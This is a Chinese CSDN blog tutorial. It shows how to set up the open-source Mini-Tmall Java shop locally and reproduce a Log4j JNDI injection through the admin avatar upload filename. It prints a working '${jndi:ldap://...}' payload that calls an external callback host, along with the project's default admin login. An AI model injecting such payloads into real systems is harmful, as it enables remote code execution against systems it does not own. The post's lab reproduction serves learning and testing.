log4j代码审计漏洞复现

最新推荐文章于 2024-07-12 16:59:18 发布
最新推荐文章于 2024-07-12 16:59:18 发布
阅读量725 收藏 6
点赞数 5
分类专栏: 网络安全 程序员 黑客 文章标签: log4j 网络 web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Python_paipai/article/details/139319328
版权
程序员 同时被 3 个专栏收录
272 篇文章 2 订阅
订阅专栏
网络安全
256 篇文章 2 订阅
订阅专栏
黑客
161 篇文章 0 订阅
订阅专栏

首先声明一下,这是一套老源码了,本人只是跟着网上的步骤复现了一遍,主要目的还是面向毫无基础的xd,教学简单的java站怎么自己搭建,不至于代码审计的第一步就废了,本人也是摸着石头过河的,大佬勿喷。

**####################前期环境准备#####################
**

jdk:没有jdk的小伙伴可以去oracle官网下载,最好是下载1.8的,下载后添加环境变量,cmd执行:java -version,出现如下界面就算配置好jdk了:

项目源码:https://github.com/robin-liyong/-Mini-Tmall-。解压后放入小皮根目录,修改网站根目录为源码目录:

把目录下的sql文件拖到桌面,以方便导入,在桌面打开cmd,命令行链接mysql数据库,创建数据库并导入sql文件:

执行 create database tmalldemodb;创建名为tmalldemodb的数据库

先后执行:

use tmalldemodb;

source tmalldemodb.sql;

修改源码中的数据库连接密码为自己的mysql连接密码(本人root/root),

然后本地用idea打开项目文件:

等待idea完成项目构建,加载配置,idea打开项目时会自动加载,耐心等待,加载完成后,源码目录下会生成成一个编译好的target文件:

加载完成后,idea会自动配置项目的主类并加载好,可直接运行:

查看本地ip:

访问 http://192.168.0.181:8080/tmall/,至此搭建完成

**######################漏洞复现###################
**

idea全局文件搜索logger.info:

注意originalFileName,该变量可控 ,往上看,该变量的值为

String originalFileName = file.getOriginalFilename();

可见由originalFileName的值file.getOriginalFilename()方法得来,以下是gpt的解释和代码示例:

主要方法``MultipartFile 提供了一些常用方法,用于处理上传的文件:``   ``getOriginalFilename():返回原始文件名。``getName():返回表单中参数的名称。``getContentType():返回文件的 MIME 类型。``getBytes():以字节数组的形式返回文件内容。``getInputStream():返回文件内容的输入流。``isEmpty():判断文件是否为空。``transferTo(File dest):将上传的文件写入到目标文件。``使用示例``以下是一个完整的文件上传示例,展示了如何在控制器中使用 @RequestParam MultipartFile file 接收文件,并将其保存到服务器:``   ``前端 HTML 表单``html``复制代码``<!DOCTYPE html>``<html>``<head>`    `<title>文件上传示例</title>``</head>``<body>`    `<form action="/upload" method="post" enctype="multipart/form-data">`        `<input type="file" name="file">`        `<input type="submit" value="上传">`    `</form>``</body>``</html>

file.getOriginalFilename()将会获取表单中name="file"的值,实际情况中"file"是什么值就会获取什么值,往上定位,发现该接口为管理员头像上传接口

接口路由:admin/uploadAdminHeadImage,访问这个接口上传头像需要登录后台,连接一下数据库查看后台密码:

拼接路由访问后台:

三个管理员账号密码随便选一个登陆,这里我用的第一个:1209577113/xq,来到上传头像处上传头像并抓包(记得把插件、bp的抓包端口改成8080以外的端口,8080端口已经被项目占用,无法抓包):

file.getOriginalFilename()将会获取上图表单中标记的filename的值并赋值给变量originalFileName,既然如此,将"test.png"改成log4j的验证POC即可:

用bp自带的dnslog获取子域名,POC验证:${jndi:ldap://9u4h9dv6vmqrghww86xwpfdzkqqge5.oastify.com}

验证成功!
为了帮助大家更好的学习网络安全,我给大家准备了一份网络安全入门/进阶学习资料,里面的内容都是适合零基础小白的笔记和资料,不懂编程也能听懂、看懂这些资料!

因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享

网络安全大白
关注
  • 5
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
解决Apache Log4j 远程代码执行漏洞log4j2部分jar
12-10
解决Apache Log4j 远程代码执行漏洞log4j2部分jar,包含log4j-1.2-api-2.15.0.jar,log4j-api-2.15.0.jar,log4j-core-2.15.0.jar,log4j-to-slf4j-2.15.0.jar
Apache Log4j 2代码漏洞处置指南及检测工具.zip
12-10
Apache Log4j 2存在远程代码执行漏洞处置指南 及期检测工具
Log4j的原理及应用详解(二)
凛鼕将至的博客
07-12 810
Log4j是Apache的一个开源项目,它是一个可靠、快速、灵活的日志框架(API),主要用于Java语言编写的应用程序中。始于1996年,作为记录E.U. SEMPER(Secure Electronic Marketplace for Europe)项目跟踪信息的API。经过大量的完善和蜕变,最终演进为Log4j。 本文将跟随《Log4j的原理及应用详解(一)》的进度,继续介绍Log4j。希望通过本系列文章的学习,您将能够更好地理解Log4j的内部工作原理,掌握Log4j的使用技巧
clean code-代码整洁之道 阅读笔记(第十六章)
仁希的博客
07-08 378
代码】clean code-代码整洁之道 阅读笔记(第十六章)
谷粒商城学习笔记-18-快速开发-配置&测试微服务基本CRUD功能
epitomizelu的专栏
07-08 567
本节的主要内容是product模块整合mybatis-plus,并进行单元测试。
单元测试Mockito笔记
最新发布
wujing1_1的博客
07-12 454
Mockito是Java生态系统中最受欢迎的单元测试模拟框架之一,以其简洁易用的API和强大的模拟能力赢得了广大开发者的青睐。Mockito允许我们在不实际依赖外部资源的情况下对代码进行彻底且高效的单元测试,极大地提升了测试覆盖率和代码质量。Mockito是一种模拟框架,其核心概念是在测试过程中创建并使用“Mock对象”。Mock对象是对实际对象的一种模拟,它继承或实了被测试类所依赖的接口或类,但其行为可以根据测试需求自由定制。控制其在测试环境下的行为,从而将注意力聚焦于类本身的逻辑验证上。 的底层原理是
Go-知识测试-模糊测试
a18792721831的博客
07-11 773
模糊测试(Fuzzing)是一种通过构造随机数据对代码进行测试的测试方法,相比于单元测试,它能提供更为全面的测试覆盖,从而找出代码中的潜在漏洞。从1.18开始,Go开始正式支持模糊测试。模糊测试要保证测试文件以_test.go结尾。测试方法必须以FuzzXxx开头。模糊测试方法必须以*testing.F作为参数。Go 1.18 的 Fuzz 测试使用了一种称为 “coverage-guided fuzzing” 的技术来生成随机输入。
设计模式的七大原则
m0_52226803的博客
07-12 657
在,如果需要添加新的图表类型(例如饼状图),只需创建一个新的类(如PieChart),让它继承自AbstractChart,并实display()方法。面向对象的开发很好的解决了这个问题,一般情况下抽象的变化概率很小,让用户程序依赖于抽象,实的细节也依赖于抽象。类中该方法的预期行为(比如,没有改变车辆启动的基本含义或引入不可接受的行为变更,即车开起来细化一下,可以是汽车,公交车,卡车开起来,但都比车这个范围更小更细化),这就遵循了里氏替换原则。这样可以减少不必要的耦合,提高系统的灵活性和可维护性。
程序中的log4j、stderr、stdout日志区别
一个7年大数据开发工程师的碎碎念
07-09 1528
在实际使用中: - 专业的开发者通常更喜欢用 Log4j 这样的系统,因为它更强大,可以更好地管理所有类型的日志。 - stderr 和 stdout 更简单,常用于快速输出或者在简单的程序中。 记住,好的日志习惯就像是给未来的自己或其他开发者留下清晰的"路标",帮助理解和解决问题。选择合适的日志方式,可以让程序更容易维护和调试。
Log4j的原理及应用详解(一)
凛鼕将至的博客
07-12 669
Log4j是Apache的一个开源项目,它是一个可靠、快速、灵活的日志框架(API),主要用于Java语言编写的应用程序中。始于1996年,作为记录E.U. SEMPER(Secure Electronic Marketplace for Europe)项目跟踪信息的API。经过大量的完善和蜕变,最终演进为Log4j。
主线程结束子线程不再执行
m0_59925573的博客
07-07 271
起因是在做分布式锁的时候,我在单元测试里面创建了10个线程,然后启动。每个线程都会在run方法打印内容,但是测试结果居然什么都没输出。就很纳闷,然后推测可能是主线程执行完了子线程直接结束了,果不其然,在加上thread.join()得到了预期结果。thread.join()是当前线程,也就是main线程要等到thread线程执行完成才能继续往后执行。如果是写在main方法是不存在这个问题的,但是单测的确存在这个问题。
如何调试 Python 代码
Itmastergo的博客
07-12 656
调试Python代码的方法多种多样,从简单的打印语句到使用高级调试器,每种方法都有其适用场景。使用打印语句print调试)使用日志模块logging使用Python内置调试器pdb集成开发环境(IDE)调试工具单元测试和断言。
@RequiredArgsConstructor实构造器注入
qq_44013675的博客
07-11 689
RequiredArgsConstructor实构造器注入。
Mac虚拟机跑Windows流畅吗 Mac虚拟机连不上网络怎么解决 mac虚拟机网速慢怎么解决
2401_82916694的博客
07-10 632
选择Shared模式,你的Mac会当作虚拟机的路由器。一般来说,拥有更高性能的Cpu(如Apple M2或M3芯片)、更大的内存(建议16GB以上)、以及足够的存储空间可以显著提升虚拟机中Windows的运行流畅度。Mac的防火墙或其他安全设置可能阻止虚拟机访问网络,如果你的Mac主机可以访问网络,并且排查了上文介绍的情况,那么可以尝试关闭Mac电脑防火墙,再检查虚拟机是否可以连接网络。使用Mac虚拟机运行Windows是否流畅,取决于几个关键因素:硬件配置、虚拟机软件的选择以及虚拟机的设置。
从零开始做题:logtime
weixin_44626085的博客
07-10 238
给出1个pcapng文件。
YOLOv10改进 | 特殊场景检测篇 | 轻量级的低照度图像增强网络IAT改进YOLOv10暗光检测(全网独家首发)
Snu77的博客
07-11 8780
本文给大家带来的改进机制是轻量级的变换器模型:Illumination Adaptive Transformer (IAT),用于图像增强和曝光校正。其基本原理是通过分解图像信号处理器(ISP)管道到局部和全局图像组件,从而恢在低光或过/欠曝光条件下的正常光照sRGB图像。具体来说,IAT使用注意力查询来表示和调整ISP相关参数,例如颜色校正、伽马校正。模型具有约90k参数和约0.004s的处理速度,能够在低光增强和曝光校正的基准数据集上持续实优于最新技术(State-of-The-Art, SOTA)
log4j远程代码执行漏洞
08-14
很抱歉,我不能提供最新漏洞过程。我作为一个 AI 助手,遵循道德准则和法律法规,不参与、支持或提供与安全漏洞相关的活动。漏洞涉及到潜在的非法行为和对他人系统的攻击,这是不被允许的。 如果你对最新...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值